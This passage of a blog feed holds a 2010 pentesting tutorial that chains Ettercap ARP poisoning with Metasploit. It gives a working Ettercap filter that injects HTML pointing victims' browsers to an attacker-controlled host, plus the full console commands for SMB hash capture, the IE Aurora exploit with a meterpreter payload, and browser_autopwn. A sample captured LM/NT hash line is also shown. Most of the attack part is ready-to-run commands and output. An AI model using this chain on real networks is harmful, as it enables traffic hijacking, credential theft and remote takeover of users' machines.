class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F04%2F02%2Ffast-mac-address-changer-in-linux%2F&amp;title=Fast%20MAC%20Address%20Changer%20in%20Linux" id="wpa2a_18"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/share_save_120_16.png" width="120" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://hackarandas.com/blog/2010/04/02/fast-mac-address-changer-in-linux/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Ettercap + Metasploit &#8211; Helping the Aurora Attack</title>
		<link>http://hackarandas.com/blog/2010/01/28/ettercap-metasploit-helping-the-aurora-attack/</link>
		<comments>http://hackarandas.com/blog/2010/01/28/ettercap-metasploit-helping-the-aurora-attack/#comments</comments>
		<pubDate>Thu, 28 Jan 2010 06:48:17 +0000</pubDate>
		<dc:creator>Ch0ks</dc:creator>
				<category><![CDATA[Artículos]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Adrian Puente Z.]]></category>
		<category><![CDATA[arp poisoning]]></category>
		<category><![CDATA[aurora]]></category>
		<category><![CDATA[browser_autopwn]]></category>
		<category><![CDATA[ettercap]]></category>
		<category><![CDATA[hackarandas]]></category>
		<category><![CDATA[hash]]></category>
		<category><![CDATA[metasploit]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[smb]]></category>

		<guid isPermaLink="false">http://hackarandas.com/blog/?p=160</guid>
		<description><![CDATA[I found a nice trick from Fulfor based in another trick from Iron Geek that I applied in a Pentest using the magical HD Moore&#8217;s Metasploit and his browser_autopwn module and now I am adding the Aurora IE new Metasploit module. This trick has 3 parts: The Ettercap Filter Based on the Irongeek&#8217;s Fun with [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://hackarandas.com/blog/wp-content/uploads/2010/01/aurora1-150x150.jpg" style="margin: 10px 10px 0pt 0pt; float: left; width: 120px; height: 134px;" title="Aurora Boreal" alt="" /><br />
I found a nice trick from <a href="http://usefulfor.com/security/2008/06/24/lm-challenge-ettercap-filter/">Fulfor</a> based in another trick from <a href="http://www.irongeek.com/i.php?page=security/ettercapfilter">Iron Geek </a> that I applied in a Pentest using the magical <a href="http://www.metasploit.com/">HD Moore&#8217;s Metasploit</a> and his browser_autopwn module and now I am adding the Aurora IE new Metasploit module.</p>
<p>This trick has 3 parts:</p>
<p><strong>The Ettercap Filter</strong></p>
<p>Based on the Irongeek&#8217;s <a href="http://www.irongeek.com/i.php?page=security/ettercapfilter">Fun with Ettercap Filters</a> and  <a href="http://usefulfor.com/security/2008/06/24/lm-challenge-ettercap-filter/">Bob&#8217;s Fulfor article</a> I am creating the next ettercap filter: </p>
<div class="dean_ch" style="white-space: wrap;"> <span class="co2"># Just copy and paste in you terminal.</span><br />
cat &gt; ch0ks.<span class="me1">browser_autopwn</span>.<span class="me1">attack</span>.<span class="me1">filter</span> &lt;&lt; __END<br />
<span class="kw1">if</span> <span class="br0">&#40;</span>ip.<span class="me1">proto</span> == TCP &amp;&amp; tcp.<span class="me1">dst</span> == <span class="nu0">80</span><span class="br0">&#41;</span> <span class="br0">&#123;</span><br />
&nbsp; &nbsp;<span class="kw1">if</span> <span class="br0">&#40;</span>search<span class="br0">&#40;</span>DATA.<span class="me1">data</span>, <span class="st0">&quot;Accept-Encoding&quot;</span><span class="br0">&#41;</span><span class="br0">&#41;</span> <span class="br0">&#123;</span><br />
&nbsp; &nbsp; &nbsp; replace<span class="br0">&#40;</span><span class="st0">&quot;Accept-Encoding&quot;</span>, <span class="st0">&quot;Accept-gnidocnE&quot;</span><span class="br0">&#41;</span>; <br />
&nbsp; &nbsp; &nbsp; <span class="co2"># note: replacement string is same length as original string</span><br />
&nbsp; &nbsp; &nbsp; msg<span class="br0">&#40;</span><span class="st0">&quot;Encoding Taken Care Of&#8230;<span class="es0">\n</span>&quot;</span><span class="br0">&#41;</span>;<br />
<span class="br0">&#125;</span><br />
<span class="br0">&#125;</span><br />
<span class="kw1">if</span> <span class="br0">&#40;</span>ip.<span class="me1">proto</span> == TCP &amp;&amp; tcp.<span class="me1">src</span> == <span class="nu0">80</span><span class="br0">&#41;</span> <span class="br0">&#123;</span><br />
replace<span class="br0">&#40;</span><span class="st0">&quot;head&gt;&quot;</span>, <span class="st0">&quot;head&gt; &lt;img src=<span class="es0">\&quot;</span>http://192.168.123.3:80/<span class="es0">\&quot;</span>&gt; &lt;img src=<span class="es0">\&quot;</span><span class="es0">\\</span><span class="es0">\\</span>192.168.123.3<span class="es0">\\</span>share<span class="es0">\\</span>pixel.gif<span class="es0">\&quot;</span>&gt;&quot;</span><span class="br0">&#41;</span>;<br />
replace<span class="br0">&#40;</span><span class="st0">&quot;body&gt;&quot;</span>, <span class="st0">&quot;body&gt; &lt;img src=<span class="es0">\&quot;</span>http://192.168.123.3:80/<span class="es0">\&quot;</span>&gt; &lt;img src=<span class="es0">\&quot;</span><span class="es0">\\</span><span class="es0">\\</span>192.168.123.3<span class="es0">\\</span>share<span class="es0">\\</span>pixel.gif<span class="es0">\&quot;</span>&gt;&quot;</span><span class="br0">&#41;</span>;<br />
msg<span class="br0">&#40;</span><span class="st0">&quot;Replacement Filter Ran.<span class="es0">\n</span>&quot;</span><span class="br0">&#41;</span>;<br />
<span class="br0">&#125;</span></p>
<p>__END</p></div>
<p>The IP string 192.168.123.3:80 is the IP with the port where I have the browser_autopwn module wating for the connection and I am using the head and body tag because I want my attack to  be the first thing they load. Now we compile the code:</p>
<div class="dean_ch" style="white-space: wrap;">
etterfilter -o ch0ks.browser_autopwn.attack.ef ch0ks.browser_autopwn.attack.filter</p>
<p>etterfilter NG<span class="nu0">-0.7</span><span class="nu0">.3</span> copyright <span class="nu0">2001</span><span class="nu0">-2004</span> ALoR &amp; NaGA</p>
<p>
&nbsp;<span class="nu0">12</span> protocol tables loaded:<br />
&nbsp; &nbsp; DECODED DATA udp tcp gre icmp ip arp wifi fddi <span class="kw2">tr</span> eth </p>
<p>&nbsp;<span class="nu0">11</span> constants loaded:<br />
&nbsp; &nbsp; VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP </p>
<p>&nbsp;Parsing <span class="kw3">source</span> <span class="kw2">file</span> <span class="st0">&#8216;ch0ks.browser_autopwn.attack.filter&#8217;</span> &nbsp;<span class="kw1">done</span>.</p>
<p>&nbsp;Unfolding the meta-tree &nbsp;<span class="kw1">done</span>.</p>
<p>&nbsp;Converting labels to real offsets &nbsp;<span class="kw1">done</span>.</p>
<p>&nbsp;Writing output to <span class="st0">&#8216;ch0ks.browser_autopwn.attack.ef&#8217;</span> &nbsp;<span class="kw1">done</span>.</p>
<p>&nbsp;-&gt; Script encoded into <span class="nu0">16</span> instructions.<br />
&nbsp;</div>
<p>Now we start the ettercap making the ARP Poisoning attack and injecting the HTML code:</p>
<div class="dean_ch" style="white-space: wrap;">
ettercap -P smb_down -i eth0 -l logfile-`<span class="kw2">date</span> +%F-%s` -m msgfile-`<span class="kw2">date</span> +%F-%s` -T &nbsp;-M arp:remote -F ch0ks.browser_autopwn.attack.ef &nbsp;/<span class="nu0">192.168</span><span class="nu0">.123</span><span class="nu0">.39</span>,<span class="nu0">42</span>,<span class="nu0">33</span>,<span class="nu0">106</span>,<span class="nu0">154</span>/ /<span class="nu0">192.168</span><span class="nu0">.123</span><span class="nu0">.1</span>/<br />
&nbsp;</div>
<p>The commands is running ettercap with the smb_down plugin that forces the connection to be a LM authentication, so it searches for the \\192.168.5.45\share\pixel.gif file that will be waiting the metasploit auxiliary/server/capture/smb module and will be logging the hashes. Also the Ettercap will be logging everything in the logfile and msgfile and making an <a href="http://http://en.wikipedia.org/wiki/ARP_spoofing">ARP Poisoning </a> between the first IPs in // and the second, I really recommend to use a little number of IPs and the Gateway to avoid making a <a href="http://en.wikipedia.org/wiki/Denial-of-service_attack">DoS</a> on the network. The -F is the parameter will load our brand new filter that will inject on the fly HTML code in the traffic between the victims, that&#8217;s why is important to use the gateway.</p>
<p>No we have to start our Metasploit attack. This is not new, I took the idea from <a href="http://usefulfor.com/security/2008/06/24/lm-challenge-ettercap-filter/">Bob&#8217;s Fulfor article</a>. I just gonna update it to work with the Metasploit Framework 3 and add it the browser_autopwn  or the aurora attack. </p>
<p>In the moment I am writting this article I am using the metasploit v3.3.4-dev [core:3.3 api:1.0].</p>
<div class="dean_ch" style="white-space: wrap;">
&nbsp;<br />
<span class="re3"># &nbsp; &nbsp;# ###### ##### &nbsp; ## &nbsp; &nbsp;#### &nbsp;##### &nbsp;# &nbsp; &nbsp; &nbsp; #### &nbsp;# ##### </span><br />
<span class="re3">## &nbsp;## # &nbsp; &nbsp; &nbsp; &nbsp;# &nbsp; &nbsp;# &nbsp;# &nbsp;# &nbsp; &nbsp; &nbsp;# &nbsp; &nbsp;# # &nbsp; &nbsp; &nbsp;# &nbsp; &nbsp;# # &nbsp; # &nbsp; </span><br />
<span class="re3"># ## # ##### &nbsp; &nbsp;# &nbsp; # &nbsp; &nbsp;# &nbsp;#### &nbsp;# &nbsp; &nbsp;# # &nbsp; &nbsp; &nbsp;# &nbsp; &nbsp;# # &nbsp; # &nbsp; </span><br />
<span class="re3"># &nbsp; &nbsp;# # &nbsp; &nbsp; &nbsp; &nbsp;# &nbsp; ###### &nbsp; &nbsp; &nbsp;# ##### &nbsp;# &nbsp; &nbsp; &nbsp;# &nbsp; &nbsp;# # &nbsp; # &nbsp; </span><br />
<span class="re3"># &nbsp; &nbsp;# # &nbsp; &nbsp; &nbsp; &nbsp;# &nbsp; # &nbsp; &nbsp;# # &nbsp; &nbsp;# # &nbsp; &nbsp; &nbsp;# &nbsp; &nbsp; &nbsp;# &nbsp; &nbsp;# # &nbsp; # &nbsp; </span><br />
<span class="re3"># &nbsp; &nbsp;# ###### &nbsp; # &nbsp; # &nbsp; &nbsp;# &nbsp;#### &nbsp;# &nbsp; &nbsp; &nbsp;###### &nbsp;#### &nbsp;# &nbsp; # &nbsp; </span></p>
<p>&nbsp; &nbsp; &nbsp; &nbsp;=<span class="br0">&#91;</span> metasploit v3<span class="nu0">.3</span><span class="nu0">.4</span>-dev <span class="br0">&#91;</span>core:<span class="nu0">3.3</span> api:<span class="nu0">1.0</span><span class="br0">&#93;</span><br />
+ &#8212; &#8211;=<span class="br0">&#91;</span> <span class="nu0">324</span> exploits &#8211; <span class="nu0">105</span> auxiliary<br />
+ &#8212; &#8211;=<span class="br0">&#91;</span> <span class="nu0">217</span> payloads &#8211; <span class="nu0">20</span> encoders &#8211; <span class="nu0">6</span> nops<br />
&nbsp; &nbsp; &nbsp; &nbsp;=<span class="br0">&#91;</span> svn r8286 updated today <span class="br0">&#40;</span><span class="nu0">2010.01</span><span class="nu0">.28</span><span class="br0">&#41;</span></p>
<p>msf &gt;</p></div>
<p>For the next modules you need to work with the root account because you need to open priviledges ports like 80, 135 and 445 for the attack to work. I am using Ubuntu Linux Karmic Koala, but you can use the <a href="http://remote-exploit.org/backtrack.html">Backtrack Project</a> for this attack.</p>
<p><strong>NTLM or LM Interception.</strong></p>
<p>We start the attack.</p>
<div class="dean_ch" style="white-space: wrap;">
<span class="kw2">sudo</span> msfconsole <br />
msf &gt; use auxiliary/server/capture/smb<br />
msf auxiliary<span class="br0">&#40;</span>smb<span class="br0">&#41;</span> &gt; <span class="kw1">set</span> &nbsp;LOGFILE Metasploit139.log<br />
LOGFILE =&gt; Metasploit139.log<br />
msf auxiliary<span class="br0">&#40;</span>smb<span class="br0">&#41;</span> &gt; <span class="kw1">set</span> &nbsp;PWFILE Metasploit139.<span class="kw3">pwd</span> <br />
PWFILE =&gt; Metasploit139.<span class="kw3">pwd</span><br />
msf auxiliary<span class="br0">&#40;</span>smb<span class="br0">&#41;</span> &gt; run<br />
<span class="br0">&#91;</span>*<span class="br0">&#93;</span> Auxiliary module execution completed<br />
<span class="br0">&#91;</span>*<span class="br0">&#93;</span> Server started.</p>
<p>msf auxiliary<span class="br0">&#40;</span>smb<span class="br0">&#41;</span> &gt; <span class="kw1">set</span> &nbsp;LOGFILE Metasploit445.log &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />
LOGFILE =&gt; Metasploit445.log<br />
msf auxiliary<span class="br0">&#40;</span>smb<span class="br0">&#41;</span> &gt; <span class="kw1">set</span> &nbsp;PWFILE Metasploit445.<span class="kw3">pwd</span> <br />
PWFILE =&gt; Metasploit445.<span class="kw3">pwd</span><br />
msf auxiliary<span class="br0">&#40;</span>smb<span class="br0">&#41;</span> &gt; <span class="kw1">set</span> SRVPORT <span class="nu0">445</span> <br />
SRVPORT =&gt; <span class="nu0">445</span><br />
msf auxiliary<span class="br0">&#40;</span>smb<span class="br0">&#41;</span> &gt; run<br />
<span class="br0">&#91;</span>*<span class="br0">&#93;</span> Auxiliary module execution completed<br />
<span class="br0">&#91;</span>*<span class="br0">&#93;</span> Server started.<br />
msf auxiliary<span class="br0">&#40;</span>smb<span class="br0">&#41;</span> &gt; <br />
&nbsp;</div>
<p>I am running the service on both 139 and 445 because in my experience it improves the chances to catch an authentication hash. Now we have to wait and with some luck you sould see something like:</p>
<p>[*] Received 192.168.0.103:2281 MYDOMAIN\LAMEUSER LMHASH:7c83b9be93e202a4be355b75e982144b59bb9f836ec26200 NTHASH:9fc0fba25cb2817441a0ca8c003a4b68da83ef9e72514b2e OS:Windows 2002 2600 Service Pack 1 LM:Windows 2002 5.1</p>
<p>This is good but you can&#8217;t just use that hash to authenticate so you have to crack it using the idea from carnal0wnage&#8217;s blog article: <a href="http://carnal0wnage.blogspot.com/2009/04/using-metasploit-smb-sniffer-module.html">Using the Metasploit SMB Sniffer Module</a> NOTE: The tool halflm_second.rb is in the tools directory inside the Metsploit directory.</p>
<p><strong>Attacking the Browser directly</strong></p>
<p>Now we have to start the browser_autopwn </p>
<div class="dean_ch" style="white-space: wrap;">
msf auxiliary<span class="br0">&#40;</span>smb<span class="br0">&#41;</span> &gt; use windows/browser/ie_aurora &nbsp; &nbsp; <br />
msf exploit<span class="br0">&#40;</span>ie_aurora<span class="br0">&#41;</span> &gt; <span class="kw1">set</span> SRVPORT <span class="nu0">80</span> &nbsp; <br />
SRVPORT =&gt; <span class="nu0">80</span><br />
msf exploit<span class="br0">&#40;</span>ie_aurora<span class="br0">&#41;</span> &gt; <span class="kw1">set</span> URIPATH / &nbsp; &nbsp;<br />
URIPATH =&gt; /<br />
msf exploit<span class="br0">&#40;</span>ie_aurora<span class="br0">&#41;</span> &gt; <span class="kw1">set</span> PAYLOAD windows/meterpreter/bind_tcp <br />
PAYLOAD =&gt; windows/meterpreter/bind_tcp<br />
msf exploit<span class="br0">&#40;</span>ie_aurora<span class="br0">&#41;</span> &gt; show options </p>
<p>Module options:</p>
<p>&nbsp; &nbsp;Name &nbsp; &nbsp; &nbsp; &nbsp;Current Setting &nbsp;Required &nbsp;Description<br />
&nbsp; &nbsp;&#8212;- &nbsp; &nbsp; &nbsp; &nbsp;&#8212;&#8212;&#8212;&#8212;&#8212; &nbsp;&#8212;&#8212;&#8211; &nbsp;&#8212;&#8212;&#8212;&#8211;<br />
&nbsp; &nbsp;SRVHOST &nbsp; &nbsp; <span class="nu0">0.0</span><span class="nu0">.0</span><span class="nu0">.0</span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="kw2">yes</span> &nbsp; &nbsp; &nbsp; The <span class="kw3">local</span> host to listen on.<br />
&nbsp; &nbsp;SRVPORT &nbsp; &nbsp; <span class="nu0">80</span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw2">yes</span> &nbsp; &nbsp; &nbsp; The <span class="kw3">local</span> port to listen on.<br />
&nbsp; &nbsp;SSL &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw2">false</span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;no &nbsp; &nbsp; &nbsp; &nbsp;Negotiate SSL <span class="kw1">for</span> incoming connections<br />
&nbsp; &nbsp;SSLVersion &nbsp;SSL3 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; no &nbsp; &nbsp; &nbsp; &nbsp;Specify the version of SSL that should be used <span class="br0">&#40;</span>accepted: SSL2, SSL3, TLS1<span class="br0">&#41;</span><br />
&nbsp; &nbsp;URIPATH &nbsp; &nbsp; / &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;no &nbsp; &nbsp; &nbsp; &nbsp;The URI to use <span class="kw1">for</span> this exploit <span class="br0">&#40;</span>default is random<span class="br0">&#41;</span></p>
<p>
Payload options <span class="br0">&#40;</span>windows/meterpreter/bind_tcp<span class="br0">&#41;</span>:</p>
<p>&nbsp; &nbsp;Name &nbsp; &nbsp; &nbsp;Current Setting &nbsp;Required &nbsp;Description<br />
&nbsp; &nbsp;&#8212;- &nbsp; &nbsp; &nbsp;&#8212;&#8212;&#8212;&#8212;&#8212; &nbsp;&#8212;&#8212;&#8211; &nbsp;&#8212;&#8212;&#8212;&#8211;<br />
&nbsp; &nbsp;EXITFUNC &nbsp;process &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="kw2">yes</span> &nbsp; &nbsp; &nbsp; Exit technique: seh, thread, process<br />
&nbsp; &nbsp;LPORT &nbsp; &nbsp; <span class="nu0">4444</span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw2">yes</span> &nbsp; &nbsp; &nbsp; The <span class="kw3">local</span> port<br />
&nbsp; &nbsp;RHOST &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;no &nbsp; &nbsp; &nbsp; &nbsp;The target address</p>
<p>
Exploit target:</p>
<p>&nbsp; &nbsp;Id &nbsp;Name<br />
&nbsp; &nbsp;&#8211; &nbsp;&#8212;-<br />
&nbsp; &nbsp;<span class="nu0">0</span> &nbsp; Automatic</p>
<p>msf exploit<span class="br0">&#40;</span>ie_aurora<span class="br0">&#41;</span> &gt; exploit <br />
<span class="br0">&#91;</span>*<span class="br0">&#93;</span> Exploit running <span class="kw2">as</span> background job.<br />
msf exploit<span class="br0">&#40;</span>ie_aurora<span class="br0">&#41;</span> &gt; <br />
<span class="br0">&#91;</span>*<span class="br0">&#93;</span> Started <span class="kw3">bind</span> handler<br />
<span class="br0">&#91;</span>*<span class="br0">&#93;</span> Using URL: http://<span class="nu0">0.0</span><span class="nu0">.0</span><span class="nu0">.0</span>:<span class="nu0">80</span>/<br />
<span class="br0">&#91;</span>*<span class="br0">&#93;</span> &nbsp;Local IP: http://<span class="nu0">192.168</span><span class="nu0">.123</span><span class="nu0">.3</span>:<span class="nu0">80</span>/<br />
<span class="br0">&#91;</span>*<span class="br0">&#93;</span> Server started.<br />
&nbsp;</div>
<p>That&#8217;s it now you have to wait so a browser bite the bait and get a meterpreter console. This was about the Aurora new Metasploit&#8217;s module because is the new trend of the night but let&#8217;s face it, it is just part of the big world of the browser attacks. So if you are just lazy you can use the browser_autopwn module:</p>
<div class="dean_ch" style="white-space: wrap;">
msf auxiliary<span class="br0">&#40;</span>browser_autopwn<span class="br0">&#41;</span> &gt; db_driver &nbsp;sqlite3 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />
<span class="br0">&#91;</span>*<span class="br0">&#93;</span> Using database driver sqlite3<br />
msf &gt; use server/browser_autopwn<br />
msf auxiliary<span class="br0">&#40;</span>browser_autopwn<span class="br0">&#41;</span> &gt; <span class="kw1">set</span> LHOST <span class="nu0">192.168</span><span class="nu0">.123</span><span class="nu0">.3</span><br />
LHOST =&gt; <span class="nu0">192.168</span><span class="nu0">.123</span><span class="nu0">.3</span><br />
msf auxiliary<span class="br0">&#40;</span>browser_autopwn<span class="br0">&#41;</span> &gt; <span class="kw1">set</span> SRVPORT <span class="nu0">80</span> &nbsp;<br />
SRVPORT =&gt; <span class="nu0">80</span><br />
msf auxiliary<span class="br0">&#40;</span>browser_autopwn<span class="br0">&#41;</span> &gt; <span class="kw1">set</span> URIPATH /<br />
URIPATH =&gt; /<br />
msf auxiliary<span class="br0">&#40;</span>browser_autopwn<span class="br0">&#41;</span> &gt; show options &nbsp;</p>
<p>Module options:</p>
<p>&nbsp; &nbsp;Name &nbsp; &nbsp; &nbsp; &nbsp;Current Setting &nbsp;Required &nbsp;Description<br />
&nbsp; &nbsp;&#8212;- &nbsp; &nbsp; &nbsp; &nbsp;&#8212;&#8212;&#8212;&#8212;&#8212; &nbsp;&#8212;&#8212;&#8211; &nbsp;&#8212;&#8212;&#8212;&#8211;<br />
&nbsp; &nbsp;LHOST &nbsp; &nbsp; &nbsp; <span class="nu0">192.168</span><span class="nu0">.123</span><span class="nu0">.3</span> &nbsp; &nbsp;<span class="kw2">yes</span> &nbsp; &nbsp; &nbsp; The IP address to use <span class="kw1">for</span> reverse-connect payloads<br />
&nbsp; &nbsp;SRVHOST &nbsp; &nbsp; <span class="nu0">0.0</span><span class="nu0">.0</span><span class="nu0">.0</span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="kw2">yes</span> &nbsp; &nbsp; &nbsp; The <span class="kw3">local</span> host to listen on.<br />
&nbsp; &nbsp;SRVPORT &nbsp; &nbsp; <span class="nu0">80</span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw2">yes</span> &nbsp; &nbsp; &nbsp; The <span class="kw3">local</span> port to listen on.<br />
&nbsp; &nbsp;SSL &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw2">false</span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;no &nbsp; &nbsp; &nbsp; &nbsp;Negotiate SSL <span class="kw1">for</span> incoming connections<br />
&nbsp; &nbsp;SSLVersion &nbsp;SSL3 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; no &nbsp; &nbsp; &nbsp; &nbsp;Specify the version of SSL that should be used <span class="br0">&#40;</span>accepted: SSL2, SSL3, TLS1<span class="br0">&#41;</span><br />
&nbsp; &nbsp;URIPATH &nbsp; &nbsp; / &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;no &nbsp; &nbsp; &nbsp; &nbsp;The URI to use <span class="kw1">for</span> this exploit <span class="br0">&#40;</span>default is random<span class="br0">&#41;</span><br />
msf auxiliary<span class="br0">&#40;</span>browser_autopwn<span class="br0">&#41;</span> &gt; run<br />
<span class="br0">&#91;</span>*<span class="br0">&#93;</span> Auxiliary module execution completed<br />
<span class="br0">&#91;</span>*<span class="br0">&#93;</span> Starting exploit modules on host <span class="nu0">192.168</span><span class="nu0">.123</span><span class="nu0">.3</span>&#8230;<br />
<span class="br0">&#91;</span>*<span class="br0">&#93;</span> &#8212;</p>
<p><span class="br0">&#91;</span>*<span class="br0">&#93;</span> Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp<br />
<span class="br0">&#91;</span>*<span class="br0">&#93;</span> Using URL: http://<span class="nu0">0.0</span><span class="nu0">.0</span><span class="nu0">.0</span>:<span class="nu0">80</span>/IC0F7kIlYh<br />
<span class="br0">&#91;</span>*<span class="br0">&#93;</span> &nbsp;Local IP: http://<span class="nu0">192.168</span><span class="nu0">.123</span><span class="nu0">.3</span>:<span class="nu0">80</span>/IC0F7kIlYh<br />
<span class="br0">&#91;</span>*<span class="br0">&#93;</span> Server started.<br />
&#8230;<br />
<span class="br0">&#91;</span>*<span class="br0">&#93;</span> Starting the payload handler&#8230;<br />
<span class="br0">&#91;</span>*<span class="br0">&#93;</span> Started reverse handler on port <span class="nu0">6666</span><br />
<span class="br0">&#91;</span>*<span class="br0">&#93;</span> Starting the payload handler&#8230;</p>
<p><span class="br0">&#91;</span>*<span class="br0">&#93;</span> &#8212; Done, found <span class="nu0">15</span> exploit modules</p>
<p><span class="br0">&#91;</span>*<span class="br0">&#93;</span> Using URL: http://<span class="nu0">0.0</span><span class="nu0">.0</span><span class="nu0">.0</span>:<span class="nu0">80</span>/<br />
<span class="br0">&#91;</span>*<span class="br0">&#93;</span> &nbsp;Local IP: http://<span class="nu0">192.168</span><span class="nu0">.123</span><span class="nu0">.3</span>:<span class="nu0">80</span>/<br />
<span class="br0">&#91;</span>*<span class="br0">&#93;</span> Server started.<br />
&nbsp;</div>
<p>That&#8217;s it now you have to wait so a browser bite the bait and get a shell inside the computer with the user priviledges that is running the browser.</p>
<p>Happy Pentesting</p>
<p><em>Adrián Puente Z.</em></p>
<p><strong>Technorati Tags: </strong><br />
<a href="http://www.technorati.com/tag/hackarandas" rel="tag">hackarandas</a>; <a href="http://www.technorati.com/tag/Adrian+Puente+Z." rel="tag">Adrian Puente Z.</a>; <a href="http://www.technorati.com/tag/Metasploit" rel="tag">Metasploit</a>; <a href="http://www.technorati.com/tag/Hacker" rel="tag">Hacker</a>; <a href="http://www.technorati.com/tag/Aurora+IE+" rel="tag">Aurora IE </a>; <a href="http://www.technorati.com/tag/Ettercap" rel="tag">Ettercap</a>; <a href="http://www.technorati.com/tag/arp+poisoning" rel="tag">arp poisoning</a>; <a href="http://www.technorati.com/tag/security" rel="tag">security</a>; <a href="http://www.technorati.com/tag/pentest" rel="tag">pentest</a>; <a href="http://www.technorati.com/tag/pentesting" rel="tag">pentesting</a>; <a href="http://www.technorati.com/tag/hacking" rel="tag">hacking</a>; <a href="http://www.technorati.com/tag/hacker" rel="tag">hacker</a>; <a href="http://www.technorati.com/tag/smb" rel="tag">smb</a>; <a href="http://www.technorati.com/tag/hashes" rel="tag">hashes</a>; <a href="http://turbotagger.brainbliss.com">Tag generator</a></p>
<p><a class="a2a_button_slashdot" href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F01%2F28%2Fettercap-metasploit-helping-the-aurora-attack%2F&amp;linkname=Ettercap%20%2B%20Metasploit%20%E2%80%93%20Helping%20the%20Aurora%20Attack" title="Slashdot" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a><a class="a2a_button_tumblr" href="http://www.addtoany.com/add_to/tumblr?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F01%2F28%2Fettercap-metasploit-helping-the-aurora-attack%2F&amp;linkname=Ettercap%20%2B%20Metasploit%20%E2%80%93%20Helping%20the%20Aurora%20Attack" title="Tumblr" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/tumblr.png" width="16" height="16" alt="Tumblr"/></a><a class="a2a_button_wordpress" href="http://www.addtoany.com/add_to/wordpress?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F01%2F28%2Fettercap-metasploit-helping-the-aurora-attack%2F&amp;linkname=Ettercap%20%2B%20Metasploit%20%E2%80%93%20Helping%20the%20Aurora%20Attack" title="WordPress" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/wordpress.png" width="16" height="16" alt="WordPress"/></a><a class="a2a_button_twitter" href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F01%2F28%2Fettercap-metasploit-helping-the-aurora-attack%2F&amp;linkname=Ettercap%20%2B%20Metasploit%20%E2%80%93%20Helping%20the%20Aurora%20Attack" title="Twitter" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a><a class="a2a_button_linkedin" href="http://www.addtoany.com/add_to/linkedin?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F01%2F28%2Fettercap-metasploit-helping-the-aurora-attack%2F&amp;linkname=Ettercap%20%2B%20Metasploit%20%E2%80%93%20Helping%20the%20Aurora%20Attack" title="LinkedIn" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/linkedin.png" width="16" height="16" alt="LinkedIn"/></a><a class="a2a_button_google_bookmarks" href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F01%2F28%2Fettercap-metasploit-helping-the-aurora-attack%2F&amp;linkname=Ettercap%20%2B%20Metasploit%20%E2%80%93%20Helping%20the%20Aurora%20Attack" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a><a class="a2a_button_facebook" href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F01%2F28%2Fettercap-metasploit-helping-the-aurora-attack%2F&amp;linkname=Ettercap%20%2B%20Metasploit%20%E2%80%93%20Helping%20the%20Aurora%20Attack" title="Facebook" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a><a class="a2a_button_google_reader" href="http://www.addtoany.com/add_to/google_reader?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F01%2F28%2Fettercap-metasploit-helping-the-aurora-attack%2F&amp;linkname=Ettercap%20%2B%20Metasploit%20%E2%80%93%20Helping%20the%20Aurora%20Attack" title="Google Reader" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/reader.png" width="16" height="16" alt="Google Reader"/></a><a class="a2a_button_digg" 